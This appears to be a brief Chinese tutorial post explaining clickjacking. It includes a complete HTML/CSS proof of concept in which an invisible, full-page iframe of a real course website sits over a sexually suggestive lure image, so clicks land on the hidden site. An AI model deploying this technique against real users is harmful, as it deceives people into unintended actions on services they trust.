HTML配合css的漏洞
1.首先来说纯粹的HTML网页是几乎没有漏洞。
2.其次就算有HTML漏洞,一般都是浏览器渲染等方式出现(这属于浏览器漏洞)。
3.单网页漏洞一般都是html配合css、javascipt产生。

记录一个html配合css框架漏洞

原理:
通过调整漂浮窗口透明度和位置来达到界面跳转
用到核心标签iframe来实现,具体看以下代码

常见场景:各类盗版小说网站、被黑客攻击的网站。
该类攻击很难从外表判断

代码如下


<!DOCTYPE HTML>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<head>
<title>点击劫持</title>
<h1>点击图脱衣</h1>
<div><style>
     html,body,iframe{
         display: block;
          height: 100%;
          width: 100%;
          margin: 0;
          padding: 0;
          border:none;
     }
     iframe{
          opacity:20;
          filter:alpha(opacity=20); /* IE */
          -moz-opacity:0.2; /* Moz + FF */
          opacity: 0; /* 支持CSS3的浏览器(FF 1.5也支持)*/
          position:absolute;
          z-index:2;
     }
     button{
          position:absolute;
          top: 80px;
          left: 0px;
          z-index: 1;
          width: 614px;
          height: 1000px;
     }

</style>
</head>
     <body>
     <button>
     <img src="https://meinv.page/wp-content/uploads/2020/04/004-12-614x1024.jpg" />
     </button>
</div>

<iframe src="https://www.icourse163.org/"></iframe>
     </body>
</html>